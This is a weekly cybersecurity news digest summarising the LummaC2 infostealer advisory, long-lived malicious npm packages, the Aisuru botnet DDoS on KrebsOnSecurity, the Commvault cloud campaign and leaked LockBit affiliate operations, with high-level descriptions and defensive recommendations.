CyberBakery Chronicles (26 May 2025)

Your Weekly Cybersecurity Update (26 May 2025)

• Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organisations

• Malware in NPM Repository Went Undetected for Two Years

• KrebsOnSecurityFaces Almost Record-Breaking 6.3 Tbps DDoS Attack

• CISA Warns Commvault Clients About Campaign Targeting Cloud Applications

• Dissecting LockBit: Affiliate Operations Revealed by Data Leak

Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organisations

On May 21, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint advisory (AA25-141B) highlighting the active exploitation of LummaC2 malware—a sophisticated information stealer targeting critical infrastructure sectors across the United States. 

What Is LummaC2?

LummaC2 is a subscription-based infostealer malware that emerged on Russian-speaking cybercriminal forums in 2022. It is engineered to infiltrate Windows systems (from Windows 7 through Windows 11) and exfiltrate a wide array of sensitive data, including:  

• System profiling details

• Browser information (cookies, saved passwords, extensions)

• Cryptocurrency wallet credentials

• Two-factor authentication (2FA) data 

How LummaC2 Operates

Threat actors deploy LummaC2 primarily through spearphishing emails containing malicious hyperlinks or attachments. A notable tactic involves tricking users into executing a fake CAPTCHA, which instructs them to open the Windows Run dialogue (Win + R), paste the clipboard contents, and press Enter. This initiates a Base64-encoded PowerShell script that downloads the malware. 

To evade detection, LummaC2 is often embedded within spoofed versions of popular software applications, such as multimedia players or utility tools. This obfuscation enables the malware to bypass standard cybersecurity defences, including Endpoint Detection and Response (EDR) solutions and antivirus programs. 

Technical Capabilities

LummaC2 exhibits advanced functionalities aligned with the MITRE ATT&CK framework:

• Process Injection (T1055): Injects malicious code into legitimate processes to evade detection.

• Ingress Tool Transfer (T1105): Transfers remote files to compromised systems.

• Automated Collection (T1119): Automatically gathers sensitive information, including cryptocurrency wallet details.

• Exfiltration Over C2 Channel (T1041): Exfiltrates collected data through command and control channels. 

These capabilities allow LummaC2 to maintain persistence within infected systems and continuously exfiltrate data without immediate detection. 

Mitigation Strategies

To defend against LummaC2, organisations should implement the following measures:

• Separate User and Privileged Accounts: Allow only necessary users and applications access to the registry

• User Awareness Training: Educate employees about phishing tactics and the dangers of executing unsolicited instructions.

• Endpoint Protection: Deploy advanced EDR solutions capable of detecting and blocking malicious activities associated with LummaC2.

• Network Monitoring: Continuously monitor network traffic for unusual patterns indicative of data exfiltration.

• Use segmentation to prevent access to sensitive systems and information, possibly with the use of a Demilitarised Zone (DMZ) or a virtual private cloud (VPC) instance to isolate systems

• Software Restrictions: Implement application whitelisting to prevent unauthorised software execution.

• Regular Updates: Ensure all systems and software are up-to-date with the latest security patches.  

Additionally, organisations are encouraged to review the detailed indicators of compromise (IOCs) provided in the advisory to enhance their detection capabilities. 

Conclusion

The LummaC2 malware represents a significant threat to critical infrastructure sectors, leveraging sophisticated techniques to infiltrate systems and exfiltrate sensitive data. By understanding its operation and implementing robust cybersecurity measures, organisations can mitigate the risks posed by this and similar threats.

Malware in NPM Repository Went Undetected for Two Years

A recent investigation by security researcher Kush Pandya from Socket has uncovered a disturbing revelation: eight malicious packages were available on the npm repository for over two years, accumulating approximately 6,200 downloads during that period.

The Malicious Packages and Their Tactics

These malicious packages employed various destructive tactics, including:

• Targeted Deletion: Removing files related to Vue.js, a popular JavaScript framework, using commands tailored for both Windows and Linux systems.

• Core Function Corruption: Injecting random data into fundamental JavaScript functions, leading to unpredictable behaviour.

• Browser Storage Sabotage: Executing a sophisticated three-file attack that corrupted browser storage mechanisms, affecting authentication tokens, user preferences, shopping carts, and application states. This resulted in intermittent failures that persisted even after page refreshes.

• Multi-Phase System Attacks: Combining file deletions with forced system shutdowns, amplifying the damage inflicted on affected systems.

Notably, some payloads were programmed to activate on specific dates in 2023, while others were set to initiate in July of that year without a defined end date.

Broader Implications for the JavaScript Ecosystem

This incident underscores the vulnerabilities inherent in the open-source ecosystem, particularly within the JavaScript community. The ease of publishing packages to repositories like npm, combined with the vast number of dependencies in modern projects, creates an environment where malicious code can remain undetected for extended periods.

The fact that these packages went unnoticed for over two years highlights the need for more robust security measures, including:

• Enhanced Vetting Processes: Implementing stricter review protocols for newly published packages.

• Automated Threat Detection: Utilising advanced tools to identify and flag suspicious behaviour in packages.

• Community Vigilance: Encouraging developers to regularly audit their dependencies and stay informed about potential threats.

Conclusion

The discovery of these long-standing malicious packages serves as a stark reminder of the importance of vigilance in software development. As the reliance on open-source components continues to grow, so does the necessity for comprehensive security practices to protect against such insidious threats.

KrebsOnSecurity Faces Almost Record-Breaking 6.3 Tbps DDoS Attack

On May 12, 2025, KrebsOnSecurity, the cybersecurity blog run by investigative journalist Brian Krebs, was targeted by a massive distributed denial-of-service (DDoS) attack that peaked at 6.3 terabits per second (Tbps). This brief yet powerful assault is one of the largest ever recorded and is attributed to a new Internet of Things (IoT) botnet named “Aisuru.” 

Aisuru Botnet: The New Digital Menace

The Aisuru botnet, first identified by researchers at QiAnXin XLab in August 2024, comprises a globally dispersed network of compromised IoT devices, including routers, digital video recorders, and other systems vulnerable due to default passwords or software flaws. After its initial exposure, Aisuru reemerged in November 2024 with enhanced capabilities, incorporating a previously unknown zero-day vulnerability in Cambium Networks cnPilot routers. 

The botnet’s operators have been offering DDoS-for-hire services through public Telegram channels, with subscription tiers ranging from $150 per day to $600 per week, advertising attacks of up to two terabits per second. Notably, they have imposed restrictions on targeting measurement walls, healthcare facilities, schools, or government sites. 

Who’s to blame for this attack?

Attribution in these cases is indeed challenging, but Krebs' blog post decisively identifies an individual known online as “Forky.” This alias is linked to forum posts that prominently offer DDoS services and botnet rentals, and security researchers have firmly connected Forky to discussions involving Aisuru.

In a Telegram conversation with Krebs, Forky outright denied orchestrating the attack on Krebs, claiming that someone else may have exploited the botnet without their direct involvement.

Implications for Cybersecurity

The emergence of the Aisuru botnet and its demonstration of unprecedented attack capabilities highlight the evolving landscape of cyber threats. The fact that such powerful tools are being commercialised and made accessible through DDoS-for-hire services poses significant risks to online infrastructure. Organisations must prioritise securing IoT devices, regularly update software to patch vulnerabilities, and invest in advanced threat detection and mitigation strategies.

CISA Warns Commvault Clients About Campaign Targeting Cloud Applications

On May 22, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding a cyber threat targeting Commvault’s Metallic Microsoft 365 (M365) backup software-as-a-service (SaaS) solution hosted in Microsoft Azure. The breach potentially allowed unauthorised access to client secrets, compromising customers’ M365 environments. 

The breach was initially discovered in February 2025 when Microsoft notified Commvault of unauthorised activity within its Azure environment. A nation-state threat actor exploited a zero-day vulnerability, CVE-2025-3928, in the Commvault Web Server, enabling remote, authenticated attackers to create and execute web shells on compromised systems. This vulnerability affects multiple Commvault versions, including 11.36.0 through 11.36.45, and has been patched in subsequent releases.   

CISA believes this activity may be part of a broader campaign targeting various SaaS providers’ cloud applications with default configurations and elevated permissions. The agency recommends that organisations monitor Microsoft Entra audit logs for unauthorised modifications, implement conditional access policies restricting authentication to approved IP addresses, and rotate application secrets regularly.  

Commvault has stated that, to date, there has been no unauthorised access to customer backup data and that business operations remain unaffected. The company is working closely with cybersecurity firms and authorities, including the FBI and CISA, to investigate the incident and has implemented enhanced security measures, such as key rotation and strengthened monitoring rules. 

Organisations using Commvault’s services are urged to apply the latest security patches, review audit logs for suspicious activity, and follow CISA’s mitigation guidance to protect their environments from similar attacks.

Dissecting LockBit: Affiliate Operations Revealed by Data Leak

A significant data breach has exposed the internal operations of the LockBit ransomware group, shedding light on its affiliate structures and tactics. The leaked information, which spans December 19, 2024, to April 29, 2025, provides unprecedented insights into the group’s “LockBit Lite” program—a streamlined version of their ransomware-as-a-service (RaaS) model designed for less experienced cyber criminals.  

LockBit Lite: Lowering the Barrier to Entry

Introduced in December 2024, LockBit Lite offers affiliates access to ransomware tools for a fee of $777 USD, significantly less than the 1 BTC deposit required for the standard program. This lower-tier option allows affiliates to launch attacks swiftly but comes with limitations, such as a lack of direct access to encryption keys and reliance on administrators for decryptors. These constraints have led to operational inefficiencies, including failed decryption even after ransom payments. 

Identifying Prolific Affiliates

Analysis of the leaked data highlights several active affiliates within the LockBit Lite program. Notably, an affiliate operating under the alias “Christopher” engaged in 44 negotiations, while “jhon0722” participated in 42. Other active members include “PiotrBond,” “JamesCraig,” and “Swan.” An individual identified as “matrix777” appears to hold a senior position, with a registration date predating the Lite program’s launch, suggesting a deeper involvement in the group’s operations. 

Targeting Patterns and Ethical Breaches

The leaked records reveal a focus on Chinese organisations, attributed to their perceived willingness to pay ransoms. Surprisingly, some affiliates also targeted Russian entities, violating LockBit’s explicit prohibition against attacking Russian organisations. In one instance, administrator “matrix777” intervened after an affiliate was compromised, suspecting interference from law enforcement or rival groups, and provided a non-functional decryptor. 

Unconventional Recruitment and Victim Interaction

In an unusual twist, LockBit attempted to recruit victims into its RaaS scheme, promoting the $777 entry fee with promises of wealth. While some victims expressed interest, existing affiliates were largely unenthusiastic about onboarding new members. Additionally, affiliates like “Christopher” offered victims basic cybersecurity advice post-attack, including recommendations on password strength and network monitoring, and provided tips to disguise ransom payments as legitimate transactions. 

Implications for Cybersecurity

This data leak offers a rare glimpse into the operational dynamics of a major ransomware group, highlighting the challenges and ethical breaches within its affiliate programs. The exposure of negotiation records and internal communications underscores the risks victims face, even when complying with ransom demands. As LockBit adapts its strategies post-Operation Cronos, understanding these internal mechanisms becomes crucial for cybersecurity professionals aiming to mitigate such threats.